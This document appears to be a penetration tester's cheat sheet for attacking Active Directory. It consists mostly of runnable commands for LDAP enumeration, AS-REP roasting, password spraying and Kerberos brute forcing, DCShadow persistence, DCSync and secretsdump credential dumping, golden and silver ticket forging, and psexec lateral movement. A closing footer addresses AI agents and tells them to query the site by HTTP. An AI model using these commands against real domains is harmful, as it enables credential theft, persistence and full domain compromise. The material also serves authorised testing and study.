# AD Related

![](https://pbs.twimg.com/media/CNiCKDaUwAAPXqD?format=jpg\&name=900x900)

## Enumeration

Basic ldap enumeration

* <https://github.com/cddmp/enum4linux-ng>
* <https://github.com/ropnop/windapsearch>
* <https://github.com/CroweCybersecurity/ad-ldap-enum>

```py
python3 /opt/enum4linux-ng/enum4linux-ng.py -A 1.3.3.7 -p Password123-u morph3
python windapsearch.py -u morph3 -p morph3 -d evil.corp --dc-ip 192.168.1.2
python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd
```

## LDAP Queries

Get all the users

```
Get-ADUser -LDAPFilter "(objectClass=user)"
```

Dump ldap fully

```
export LDAPTLS_REQCERT=never
ldapsearch -LLL -x -H ldaps://dc.foobar.local -b 'dc=foobar,dc=local' -s sub '(objectclass=*)' -D 'test@foobar.local' -w foobar
```

## AS-Rep Roasting

If a user has pre auth enabled, you grab his/her hash

```
impacket-GetNPUsers ecorp.local/ -format hashcat -usersfile ./users -dc-ip 10.3.3.7
```

## Bruteforcing - Password Spraying

* <https://github.com/dafthack/DomainPasswordSpray>

```py
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
```

## Kerbrute

Kerberos(port 88) bruteforcing

* <https://github.com/ropnop/kerbrute>
* <https://github.com/ropnop/kerbrute/releases/tag/v1.0.3>

```
# Password brute
./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 192.168.1.2 rockyou.txt morph3

# Username brute
./kerbrute_linux_amd64 userenum -d evil.corp --dc 192.168.1.2 users.txt

# Password spray
./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 192.168.1.2 users.txt rockyou.txt
```

## DC Shadow

* <https://attack.stealthbits.com/how-dcshadow-persistence-attack-works>

-This is a persistence attack-

DC Shadow attack aims to inject malicious Domain Controlllers into AD infrastructure so that we can dump actual AD members.&#x20;

Find sid for that user

```
wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid
```

This will create a RPC Server and listen

```
lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:sid
```

Run this from another mimikatz

```
lsadump::dcshadow /push
```

After this, unregistration must be done. Relogin now and perform DCSync

```py
lsadump::dcsync /domain:ECORP.local /account:krbtgt
```

## DC Sync

Using mimikatz,

```
lsadump::dcsync /domain:domain /all /csv
lsadump::dcsync /user:krbtgt
```

Using DCSync.ps1,

* <https://gist.github.com/monoxgas/9d238accd969550136db>

```
https://gist.github.com/monoxgas/9d238accd969550136db
powershell.exe -c "Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat"
```

Using secretdumps module from impacket,

```py
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL
impacket-secretsdump morph3@10.11.1.75
```

## Domain Trust

```
get-domaintrustmapping
```

We get current domain or target domain sid using `Get-DomainSID`

```
kerberos::golden /user:Administrator /domain:<curr_domain> /sid:<curr_domain_sid> /krbtgt:<curr_domain_krbtgt_hash> /sids:<target_domain_sid> /ptt
```

## Golden Ticket

Use krbtgt's hash and you can forge tickets for anyone.

Get krbtgt hash,

```
lsadump::dcsync /all /csv
```

You might want to patch it

```
lsadump::lsa /patch
lsadump::trust /patch
```

Forging the ticket

* /rc4 or /krbtgt -> krbtgt hash&#x20;
* /sid -> Get-DomainSID&#x20;
* /ticket -> this parameter is optional but default is ticket.kirbi&#x20;
* /groups -> this parameter is optional but default is 513,512,520,518,519&#x20;
* /ptt -> switch to perform ptt

```
kerberos::golden /user:morph3 /domain:evil.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519 
kerberos::ptt ticket.kirbi
```

After this, your final ticket should be ready. You can also verify by using the following command that it is in your cache.

```
klist
```

You can now verify it is working.

```
dir \\DC\C$
psexec.exe \\DC cmd.exe
```

purge it

```
kerberos::purge 
```

If you want to use metasploit

```
post/windows/escalate/golden_ticket 
```

## Silver Ticket

Service accounts

ticketer,

```
python3 /opt/impacket/examples/ticketer.py -domain scrm.local -user sqlsvc -password Pegasus60 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 ksimpson -spn MSSQLSvc/dc1.scrm.local -nthash B999A16500B87D17EC7F2E2A68778F05
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.morph3.blog/windows/ad-related.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.